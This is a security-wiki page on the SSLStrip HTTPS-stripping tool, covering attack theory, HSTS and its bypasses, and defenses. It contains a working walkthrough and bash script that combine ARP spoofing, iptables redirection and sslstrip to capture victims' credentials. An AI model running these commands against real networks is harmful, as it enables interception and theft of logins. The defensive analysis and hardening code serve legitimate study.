From charlesreid1

(Major expansion: added attack theory, HSTS limitations, SSLStrip+ bypass techniques, full attack walkthrough with ARP spoofing, defenses/countermeasures, related tools, and cleaned up legacy commented-out content. (via update-page on MediaWiki MCP Server))
 
Latest revision as of 05:49, 19 June 2026

A tool from Moxie Marlinspike for performing HTTPS stripping attacks.

Also see SSLSniff, Bettercap, MITMf.

Overview

SSLStrip is a Man-in-the-Middle (MITM) tool that implements Moxie Marlinspike's SSL stripping attacks, first presented at Black Hat DC 2009 in the talk "New Tricks for Defeating SSL in Practice". The tool transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and maps those links into look-alike HTTP links or homograph-similar HTTPS links, effectively downgrading secure connections to plaintext.

The core insight behind SSLStrip is that users rarely type https:// directly into their browsers. Instead, they typically arrive at secure pages through one of two paths:

  1. Clicking an HTTP link that redirects to HTTPS (via a 301/302 redirect or a meta-refresh)
  2. Clicking a link on an HTTP page that points to an HTTPS URL

SSLStrip exploits both of these transitions by intercepting them and forcing the victim's browser to continue communicating over unencrypted HTTP, while the attacker maintains a separate HTTPS connection to the legitimate server.

Attack Model

The attack follows this communication pattern:

Victim  <== HTTP ==>  Attacker  <== HTTPS ==>  Web Server

The attacker sits between the victim and the server, maintaining two separate connections:

  • Victim-to-Attacker: Unencrypted HTTP. The victim believes they are communicating with the legitimate server.
  • Attacker-to-Server: Encrypted HTTPS. The server believes it is communicating directly with the victim.

All data passing through the attacker is visible in plaintext, including login credentials, session cookies, and personal information.

How SSLStrip Works

SSLStrip performs several key transformations on traffic:

HTTPS Link Rewriting

The tool parses all HTTP traffic passing through it and replaces occurrences of https:// with http:// in HTML content (links, form actions, redirects, etc.). This prevents the victim's browser from ever initiating an HTTPS connection.

For example, a login link like:

<a href="https://example.com/login">Login</a>

...is rewritten to:

<a href="http://example.com/login">Login</a>

Redirect Stripping

When a server responds with an HTTP 301/302 redirect pointing to an HTTPS URL (a common pattern for sites that enforce HTTPS), SSLStrip intercepts the redirect and changes the Location header from https:// to http://. The victim's browser then follows the rewritten redirect over plain HTTP.

Favicon Spoofing (Lock Icon)

SSLStrip can substitute a padlock favicon on secure-looking requests (-f flag). When the victim's browser renders the page, the padlock appears as the page's favicon (which older browsers displayed next to the address bar), giving a false sense of security.

Session Killing

The -k flag enables session denial: SSLStrip kills existing sessions in progress, forcing victims to re-authenticate. This is useful for capturing credentials that might otherwise remain cached.

Modern Limitations: HSTS

The primary defense against SSLStrip is HTTP Strict Transport Security (HSTS), defined in RFC 6797. When a browser visits an HSTS-enabled site over HTTPS, the server sends a Strict-Transport-Security header instructing the browser to always use HTTPS for that domain for a specified duration (e.g., max-age=31536000 for one year).

Once HSTS is cached by the browser:

  • All HTTP requests to that domain are internally upgraded to HTTPS before leaving the browser.
  • Certificate errors are treated as fatal (no click-through warnings).
  • SSLStrip cannot intercept or downgrade the connection.

Furthermore, browsers maintain HSTS preload lists — a hardcoded set of domains (including google.com, facebook.com, twitter.com, and many others) that are always forced to HTTPS, even on first visit. This effectively neuters SSLStrip against those sites.

SSLStrip+ and HSTS Bypass

To counter HSTS, an extended version called SSLStrip+ (also referred to as sslstrip2) was developed by Leonardo Nve. It adds techniques to bypass HSTS protection:

Homograph / Look-Alike Domains

SSLStrip+ rewrites HTTPS URLs to use visually similar domain names that are not on the HSTS preload list. For example, https://www.paypal.com might become http://www.paypaI.com (where the 'l' is replaced with an uppercase 'I').

DNS Spoofing Integration

Because the rewritten domains (with homograph substitutions) are fake, SSLStrip+ requires a companion DNS server (such as dns2proxy) to resolve the fake hostnames back to the attacker's machine. The DNS server intercepts queries for the spoofed domains and returns the attacker's IP address.

Delorean / NTP Attacks

Another HSTS bypass technique uses Delorean, an NTP MITM tool by Jose Selvi. Delorean manipulates NTP traffic to set the victim's system clock far into the past (e.g., before a site's HSTS policy was issued), causing cached HSTS entries to appear expired. Combined with SSLStrip+, this can defeat HSTS on sites not in the preload list.
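The HSTS mechanism described above, as an added example (not code from sslstrip, sslstrip2 or this wiki): a small Python model of the browser's RFC 6797 "known HSTS host" cache that upgrades a stripped http:// link before it ever leaves the browser, and shows which cases the cache does and does not cover: a look-alike host never seen over HTTPS (not covered), an entry whose validity window has passed (not covered, the effect a manipulated clock aims for), and a preloaded host on its first visit (covered). The PRELOAD set and all hostnames are constructed for the example, and expiry is modelled as receipt time plus max-age.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit, urlunsplit

# Constructed stand-in for the browser's built-in preload list.
PRELOAD = {"google.com", "facebook.com", "twitter.com"}


@dataclass
class HstsEntry:
    expires: float            # absolute time: receipt time + max-age
    include_subdomains: bool


def parse_sts(header, received_at):
    """Parse a Strict-Transport-Security value; None if max-age is missing/bad."""
    max_age, include_sub = None, False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(value.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            include_sub = True
    if max_age is None:
        return None
    return HstsEntry(received_at + max_age, include_sub)


class HstsCache:
    def __init__(self):
        self.known = {}       # host -> HstsEntry

    def observe(self, host, header, received_at, over_https=True):
        # A policy only counts when it arrived over HTTPS (RFC 6797), so the
        # plaintext leg SSLStrip controls can never plant or refresh one.
        if not over_https:
            return
        entry = parse_sts(header, received_at)
        if entry is None:
            return
        if entry.expires <= received_at:      # max-age=0 deletes the entry
            self.known.pop(host.lower(), None)
        else:
            self.known[host.lower()] = entry

    def is_known_host(self, host, now):
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            if candidate in PRELOAD:          # preload covers subdomains too
                return True
            entry = self.known.get(candidate)
            if entry is None or entry.expires <= now:
                continue                      # expired entries no longer apply
            if i == 0 or entry.include_subdomains:
                return True
        return False

    def upgrade(self, url, now):
        """The step that defeats SSLStrip: http:// -> https:// inside the browser."""
        p = urlsplit(url)
        if p.scheme != "http" or not p.hostname or not self.is_known_host(p.hostname, now):
            return url
        netloc = p.hostname if p.port in (None, 80) else f"{p.hostname}:{p.port}"
        return urlunsplit(("https", netloc, p.path, p.query, p.fragment))


def demo(now=1_700_000_000.0):
    """Walk the page's scenarios; hosts are constructed, not real observations."""
    cache = HstsCache()
    cache.observe("example.com", "max-age=31536000; includeSubDomains", now)
    stripped = "http://example.com/login"         # link after SSLStrip rewriting
    lookalike = "http://www.paypaI.com/login"     # SSLStrip+ homograph host
    return {
        "stripped_link": cache.upgrade(stripped, now + 60),
        "subdomain": cache.upgrade("http://www.example.com/", now + 60),
        "lookalike": cache.upgrade(lookalike, now + 60),
        "after_expiry": cache.upgrade(stripped, now + 31536000 + 1),
        "preloaded_first_visit": cache.upgrade("http://mail.google.com/", now),
    }
```

Only the "lookalike" and "after_expiry" entries come back still as http://, which is exactly the gap SSLStrip+ (with dns2proxy) and Delorean are built around.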

Source Code

Repository:     https://github.com/moxie0/sslstrip
Original page:  https://moxie.org/software/sslstrip/
Language:       Python (requires Python 2.5+)
Dependencies:   python-twisted
SSLStrip+ fork: https://github.com/LeonardoNve/sslstrip2

Installing

Kali Linux

$ sudo apt-get install sslstrip

From Source (Original)

$ git clone https://github.com/moxie0/sslstrip.git
$ cd sslstrip
$ sudo python setup.py build && sudo python setup.py install

SSLStrip+ (HSTS Bypass Fork)

$ git clone https://github.com/LeonardoNve/sslstrip2.git
$ cd sslstrip2
$ sudo python setup.py install

Dependencies

sslstrip requires the python-twisted package:

$ sudo apt-get install python-twisted-web

Getting Help

$ sslstrip -h

sslstrip 1.0 by Moxie Marlinspike
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

Important Flags

Flag       Description
-w         Specifies the log file to write captured data to
-p         Logs only SSL POST requests (default behavior)
-s         Logs all SSL traffic to and from the server
-a         Logs all SSL and HTTP traffic
-l <port>  Port to listen on (default: 10000)
-f         Substitutes a padlock favicon on secure requests
-k         Kills existing sessions to force re-authentication

Full Attack Walkthrough

A complete SSLStrip attack involves enabling packet forwarding, setting up iptables redirection, running ARP spoofing to redirect victim traffic, launching SSLStrip itself, and reading the captured output.

Step 1: Enable IP Forwarding

By default, a Linux machine drops packets not destined for its own IP. Forwarding must be enabled so the attacker's machine routes victim traffic:

# echo "1" > /proc/sys/net/ipv4/ip_forward

To make this persistent across reboots, edit /etc/sysctl.conf:

net.ipv4.ip_forward = 1

Then apply:

# sysctl -p

Step 2: iptables Redirection

Set up an iptables rule to redirect incoming HTTP traffic (port 80) to the port SSLStrip is listening on (e.g., port 6666):

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6666

Verify the rule:

# iptables -t nat -L -n -v

To remove the rule after the attack:

# iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6666

Step 3: ARP Spoofing

Redirect the victim's traffic through the attacker's machine using ARP spoofing. This convinces the victim that the attacker's MAC address belongs to the gateway, and vice versa:

# arpspoof -i eth0 -t <victim_ip> <gateway_ip>
# arpspoof -i eth0 -t <gateway_ip> <victim_ip>

Alternatively, use Ettercap:

# ettercap -T -M arp:remote /<gateway_ip>/ /<victim_ip>/

Or use Bettercap:

$ sudo bettercap -eval "net.probe on; net.sniff on; arp.spoof on"

Step 4: Run SSLStrip

Launch SSLStrip on the designated port:

$ sslstrip -l 6666 -w /tmp/sslstrip.log -a

The -a flag logs all SSL and HTTP traffic, and -w writes output to a log file.

Step 5: Monitor Captured Data

View captured credentials and session data in real time:

$ tail -f /tmp/sslstrip.log

Or search for specific patterns (e.g., passwords):

$ grep -i "password\|passwd\|pass" /tmp/sslstrip.log

Full Script

A complete attack script combining all steps:

#!/bin/bash
# sslstrip attack script
VICTIM_IP="192.168.1.100"
GATEWAY_IP="192.168.1.1"
INTERFACE="eth0"
STRIP_PORT="6666"

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $STRIP_PORT

echo "Starting ARP spoofing..."
arpspoof -i $INTERFACE -t $VICTIM_IP $GATEWAY_IP &
arpspoof -i $INTERFACE -t $GATEWAY_IP $VICTIM_IP &

echo "Starting SSLStrip on port $STRIP_PORT..."
sslstrip -l $STRIP_PORT -w /tmp/sslstrip.log -a

SSLStrip+ Attack Walkthrough (HSTS Bypass)

When targeting sites protected by HSTS, use SSLStrip+ with dns2proxy:

Step 1: Enable Forwarding and iptables

# echo "1" > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

Step 2: Run dns2proxy

dns2proxy intercepts DNS queries and resolves spoofed homograph domains back to the attacker:

$ cd dns2proxy
$ python dns2proxy.py

Step 3: Run SSLStrip+

$ cd sslstrip2
$ python sslstrip.py -a -w /tmp/sslstrip.log

Step 4: ARP Spoof

# arpspoof -i eth0 -t <victim_ip> <gateway_ip>
# arpspoof -i eth0 -t <gateway_ip> <victim_ip>

Defenses and Countermeasures

Server-Side Defenses

  • Enable HSTS: Add the Strict-Transport-Security header with a long max-age and the includeSubDomains directive.
  • HSTS Preload: Submit your domain to the browser HSTS preload list at hstspreload.org. This hardcodes HTTPS enforcement into browsers.
  • HTTPS-Only: Serve content exclusively over HTTPS. Do not run an HTTP listener at all, or use it only to serve a permanent redirect to HTTPS.
  • Secure Cookies: Set the Secure flag on all cookies so they are never transmitted over HTTP.
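A defender's check for the list above, added here as example code (not part of sslstrip or this wiki): it scores a captured response against the server-side defenses, i.e. HSTS with at least a one-year max-age and includeSubDomains, an HTTP listener that does nothing but 301 to https://, and Secure cookies. The sample responses and hostnames are constructed.

```python
import re

ONE_YEAR = 31536000  # the page's example max-age


def audit_response(scheme, status, headers):
    """Check one response against the server-side defenses listed above.

    scheme  -- "http" or "https", the listener that produced the response
    status  -- HTTP status code
    headers -- list of (name, value) pairs; Set-Cookie legitimately repeats
    Returns a list of findings; an empty list means the response passes."""
    findings = []
    hdrs = [(name.lower(), value) for name, value in headers]

    def first(name):
        return next((v for n, v in hdrs if n == name), None)

    if scheme == "http":
        # The plaintext listener may exist only to send a permanent redirect to
        # HTTPS; real content over HTTP is exactly what SSLStrip rewrites.
        location = (first("location") or "").lower()
        if status != 301 or not location.startswith("https://"):
            findings.append("HTTP listener serves content instead of a 301 to https://")
    else:
        # Browsers ignore STS received over HTTP (RFC 6797), so the policy is
        # judged on the HTTPS response only.
        sts = first("strict-transport-security")
        max_age = re.search(r"max-age\s*=\s*\"?(\d+)", sts or "", re.I)
        if sts is None or max_age is None:
            findings.append("missing or malformed Strict-Transport-Security")
        else:
            if int(max_age.group(1)) < ONE_YEAR:
                findings.append(f"HSTS max-age={max_age.group(1)} is below one year")
            if "includesubdomains" not in sts.lower():
                findings.append("HSTS lacks includeSubDomains")

    for name, value in hdrs:
        if name != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in value.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {cookie_name!r} lacks the Secure flag")
    return findings


# Constructed sample responses: the weak pair beside the hardened pair.
WEAK_HTTP = ("http", 200, [("Content-Type", "text/html")])
WEAK_HTTPS = ("https", 200, [
    ("Strict-Transport-Security", "max-age=86400"),
    ("Set-Cookie", "session=abc123; Path=/; HttpOnly"),
])
HARDENED_HTTP = ("http", 301, [("Location", "https://www.example.com/")])
HARDENED_HTTPS = ("https", 200, [
    ("Strict-Transport-Security", "max-age=63072000; includeSubDomains; preload"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly"),
])


def audit_all():
    """Return {label: findings} for the four constructed responses."""
    samples = {"weak_http": WEAK_HTTP, "weak_https": WEAK_HTTPS,
               "hardened_http": HARDENED_HTTP, "hardened_https": HARDENED_HTTPS}
    return {label: audit_response(*resp) for label, resp in samples.items()}


if __name__ == "__main__":
    for label, findings in audit_all().items():
        print(f"{label}: {findings or 'OK'}")
```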

Client-Side Defenses

  • HTTPS Everywhere: Browser extension by the EFF that forces HTTPS on sites with known HTTPS support.
  • Always Type HTTPS: Manually type https:// when visiting sensitive sites.
  • VPN: A VPN encrypts all traffic between the client and the VPN server, preventing local-network MITM attacks.
  • Monitor Certificate Warnings: Never bypass browser certificate warnings.

Related Tools

  • SSLSniff — Another Moxie Marlinspike tool for performing certificate-based MITM attacks against SSL/TLS.
  • Bettercap — A modern, comprehensive MITM framework with built-in SSLStrip, HSTS bypass, and DNS spoofing modules.
  • MITMf — Man-in-the-Middle Framework with SSLStrip+ integration, BeEF hooking, and credential harvesting.
  • Ettercap — Classic MITM suite supporting ARP poisoning and traffic filtering.
  • dns2proxy — Companion DNS proxy for SSLStrip+ that resolves spoofed homograph domains.
  • Delorean — NTP MITM tool for manipulating system time to expire HSTS entries.

See Also

  • Iptables
  • ARP Spoofing
  • Man in the Middle

Categories: SSLStrip, SSL, MITM